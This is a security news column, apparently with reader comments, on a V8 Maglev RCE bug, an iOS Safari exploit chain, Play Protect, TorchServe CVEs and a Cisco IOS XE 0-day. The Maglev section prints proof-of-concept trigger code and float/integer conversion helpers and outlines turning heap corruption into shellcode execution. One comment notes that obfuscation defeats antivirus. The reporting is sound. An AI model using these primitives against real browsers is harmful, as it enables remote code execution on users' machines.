Google Chrome has done a lot of work on JavaScript performance, pushing the V8 engine to more and more impressive feats. Recently that optimization pipeline gained one more piece: the Maglev compiler, a mid-tier optimization step that sits between Sparkplug and TurboFan. In a Just In Time (JIT) system, the time saved by an optimization pass has to be carefully weighed against the time it costs, and Maglev is one more tool in that endless hunt for speed. And with anything this complicated, there's the occasional flaw found in the system. Of course, because we're talking about it here, it's a security vulnerability that results in Remote Code Execution (RCE).
The trick is to use Maglev's optimization against it. Set up a pair of classes, such that B extends A. Calling new B() results in an attempt to use the constructor from A, which works because the compiler checks that the constructors match before doing so. There's another way to call a constructor in JS: something like Reflect.construct(B, [], Array). This calls the B constructor, but indicates that the constructor should return an Array object. You may notice there's no array in the A class below. Tricking the compiler into using the parent class constructor in this fashion results in the array being uninitialized, and whatever happens to be in memory sets the length of the array.
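To see what the non-buggy behavior looks like, here's a minimal sketch of Reflect.construct's documented semantics, runnable in any modern JS engine (this snippet is not the vulnerability, just the mechanism the exploit abuses; the marker property is purely illustrative):

```javascript
class A {}

class B extends A {
  constructor() {
    super();
    this.marker = 42; // proves B's constructor body actually ran
  }
}

// A normal construction returns a B instance.
const plain = new B();

// Reflect.construct's third argument overrides new.target, so the
// same constructor code runs, but the allocated object is an Array.
const arr = Reflect.construct(B, [], Array);

console.log(plain instanceof B);   // true
console.log(arr instanceof Array); // true
console.log(arr.marker);           // 42
console.log(arr.length);           // 0 -- a properly initialized, empty Array
```

The last line is the key: in a correct engine, that Array is always initialized with length 0. The Maglev bug is what lets that initialization be skipped.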
```javascript
class A {}

var x = Array;

class B extends A {
  constructor() {
    x = new.target;
    super();
  }
}

function construct() {
  var r = Reflect.construct(B, [], x);
  return r;
}

// Compile optimized code
for (let i = 0; i < 2000; i++) construct();

// Trigger garbage collection to fill the free space of the heap
// (gcSize is a large allocation size defined elsewhere in the PoC)
new ArrayBuffer(gcSize);
new ArrayBuffer(gcSize);

corruptedArr = construct(); // length of corruptedArr is 0, try again...
corruptedArr = construct(); // length of corruptedArr takes the pointer of an object, which gives a large value
```
The trick here is to set up several data structures together so the uninitialized array can be used to corrupt the neighboring objects, giving arbitrary read and write of the V8 heap. Shellcode can be loaded in as other data structures, and a function pointer can be overwritten to jump to the shellcode. RCE from simply running JavaScript on a webpage. Thankfully this one was found, reported privately, and finally fixed on August 2nd.
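A common building block in exploits like this is a pair of helpers that reinterpret the bit pattern of a JavaScript double as a raw 64-bit integer and back, so pointer values read out of a corrupted array (which the engine hands back as floats) can be manipulated. A minimal, harmless sketch of those conversion helpers:

```javascript
// Two typed-array views over the same 8 bytes let us reinterpret
// a double's IEEE-754 bit pattern as a 64-bit integer and back.
const buf = new ArrayBuffer(8);
const f64 = new Float64Array(buf);
const u64 = new BigUint64Array(buf);

// float -> raw 64-bit integer (the bits, not the value)
function ftoi(f) {
  f64[0] = f;
  return u64[0];
}

// raw 64-bit integer -> float with that exact bit pattern
function itof(i) {
  u64[0] = i;
  return f64[0];
}

console.log(ftoi(1.0).toString(16)); // "3ff0000000000000", IEEE-754 for 1.0
```

With primitives like these plus the corrupted array's out-of-bounds access, an attacker can read an object's address out as a float, tweak it as an integer, and write it back.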
Safari, Too
The Threat Analysis Group from Google did an analysis of an iOS Safari 0-day exploit chain, and it’s got an interesting trick to look at. Safari has added an extra sandbox layer to keep the web renderer engine from interacting with GPU drivers directly. This attack chain contains an extra exploit to make that hop, and it uses Safari Inter-Process Communication (IPC) to do it. The vulnerability is a simple one, a buffer overflow in the GPU process. But the rest of the story is anything but simple.
The rest of the exploit reads like building a ship in a bottle, using the toehold in the rendering process to reach in and set up an exploit in the GPU process. The chain builds an arbitrary read, then an arbitrary write, flips bits to turn off security settings, and then uses object deserialization to run NSExpression. The full write-up walks through it all in excruciating detail. It's notable that iOS security has reached a point of hardening where it takes this much effort to turn an RCE into an actual system exploit.
Play Protect Expands
It's no great secret that the ease of side-loading apps is one of Android's best and worst features when compared to the iPhone. It's absolutely the best, because it allows bypassing the Play store, running a de-Googled phone, and easily installing dev builds. But with that power comes great ability to install malware. It makes sense — Google scans apps on the Play Store for malware, so the easy way around that problem is to convince users to install malicious APKs directly. And that leads us to this week's news, that Google Play Protect is gaining the ability to review sideloaded apps upon installation, and warn the user if something seems particularly off.
It sounds very similar to the approach taken by Windows Defender, though hopefully malicious apps won't be able to hijack the security process to block legitimate installs. One concerning detail is the radio silence about disabling the feature, either globally or on a per-install basis. The feature preview only shows the options to either scan the app, uploading some details to Google, or cancel the install. Hopefully this will work like visiting an insecure site in Chrome, where an extra click or two is enough to proceed anyway.
Where’s the Firewall?
Earlier this month, researchers at Oligo published a system takeover exploit chain in TorchServe. It’s… a legitimate problem for many TorchServe installs, scoring a CVSS 9.9. And arguably, it’s really not a vulnerability at all. It contains a default that isn’t actually default, and a Server-Side Request Forgery (SSRF) that’s not a forgery. And for all the ups and downs, apparently nobody had the thought that a default ALLOW firewall might be a bad idea. *sigh* Let’s dive in.
PyTorch is a Python library for machine learning, and it's become one of the rising stars of the AI moment we're still in the midst of. One of the easiest ways to get PyTorch running for multiple users is the TorchServe project, which is put together with a combination of Python and Java; that detail will be important in a moment. The idea is that you can load a model into the server, and users can run their queries using a simple REST interface. TorchServe actually has three API interfaces, the normal inference API, a metrics API, and the management API, each on a different port.
The management API doesn't implement any authentication checks, and the documentation does warn about this, stating that "TorchServe only allows localhost access by default". It turns out that this statement is absolutely true: TorchServe binds that interface to 127.0.0.1 by default. While the Oligo write-up gets that technicality wrong, there is a valid point to be made that some of the example configs set the management interface to bind on 0.0.0.0. Docker is a different animal altogether, by the way. Binding to 127.0.0.1 inside a Docker container blocks all traffic from outside the container, so the observation that the official TorchServe Docker image uses 0.0.0.0 is a bit silly. So to recap: it's bad to put insecure configuration in your documentation. The TorchServe project has worked to fix this.
Next, the second vulnerability comes with a CVE! CVE-2023-43654 is an SSRF, a weakness where an attacker can manipulate a remote server into sending HTTP requests to unintended places. And technically, that's true. A request to the management API can specify where the server should attempt to download a new inference model. There is an allowed_urls setting that specifies how to filter those requests, and by default it allows any file or HTTP/S request. Could that be used to trigger something unintended on an internal network? Sure. Should the allowed URLs setting default to allowing anything? Probably not. Is this issue on the backend management API actually an SSRF worthy of a CVSS 9.8 CVE? Not even close.
And the last issue, CVE-2022-1471, is a Java deserialization RCE. This one is actually a problem — sort of. The issue is actually in SnakeYAML, and was fixed last year. One of the great disadvantages of the Java ecosystem is that picking up a library fix means rebuilding the project with manually updated dependencies, and TorchServe didn't bother to pull the fix until now. If your TorchServe server loads an untrusted inference model, this vulnerability leads to RCE. Except loading an inference model executes arbitrary code by design. So it's yet another technically correct CVE that's utterly bogus.
Now, don't take my tone of disdain as a complete dismissal of the findings. As far as I can tell, there really are "tens of thousands of IP addresses" exposing the TorchServe management interface to the Internet. That really is a problem, and good on the researchers at Oligo for putting the problem together clearly. But there's something notably missing from the write-up and its recommendations: configuring the firewall! Why is anybody running a server on a public IP with a default ALLOW firewall?
Bits and Bytes
Forget the Ides of March, Beware the Cisco. This week we got news that there's a 0-day vulnerability being exploited in the wild in Cisco IOS XE. That firmware runs on switches, routers, access points, and more. And just a couple of days ago, a staggering 40,000+ devices were found to be compromised. If you have the misfortune of running a Cisco IOS XE device with the HTTP interface exposed online, or to any untrusted traffic, just assume it's compromised. Oof.
The Safari exploit seems really familiar. I think I saw this in a HaD post earlier: https://www.youtube.com/watch?v=hDek2cp0dmI
Doesn’t surprise me that google are forcing people to get sideloaded apps scanned, whether they like it or not. Google are forcibly moderating people’s bookmarks and deleting ones they don’t like. They’re also forcibly training AI on all of your gmail, google docs, google sheets, and everything you upload to google drive, in addition to messages and comments. They’ve become a lot more invasive this year.
This is on top of google’s effort to DRM the entire internet, so that only browsers they bless can access websites. Infrastructure is being implemented in chrome right now to support presenting a signature that says “this browser will never ever allow the user to block ads or pirate content.” It’s in google’s best interest, as a widespread ad network operator, to make websites block access to clients who don’t honour ads.
Not to mention, who defines what’s a “malicious” APK? Google and Google alone. Play Protect has /always/ had the ability to arbitrarily deem an APK as “malicious” and automatically uninstall it without warning or even telling the user afterward… in fact, Google’s used it in the past to ensure certain old apps “stay in the Google Graveyard where they belong” (case in point, trying to sideload old pre-killswitch versions of Play Music requires disabling Play Protect completely, since all version signatures of the GPM APK have been added to GPP’s kill-on-sight list).
As for DRMing the internet, I think Mozilla (or Tor, or someone in that circle of organizations) has already quietly announced the intent to “yeeeaaah, /no/” Google’s plans, whether by lobbying for legislation to shoot the entire premise down at the FCC level, or just plain creating a system to spoof the browser check (it certainly won’t be as easy as lying about the User-Agent string, but no code is hackproof)…
Google’s new safer internet. They “mask” your IP by routing your traffic to the website through their proxy servers. So instead of your traffic going straight to the website, it goes via google proxies. Oh yes, much safer..
AVs don’t do real behavioral analysis.. That’s why FUD crypters still work for mobile and desktop in 2023.. Play Protect claimed to have A.I. for a while, but a lot of those malicious apps just use obfuscation to get execution.. About 10 years ago a lot of AV companies claimed to have a “sandbox” and/or HIPS, which were also exposed by malware using simple obfuscation; a lot of the time it’s just a new stub doing layers of xor or rc5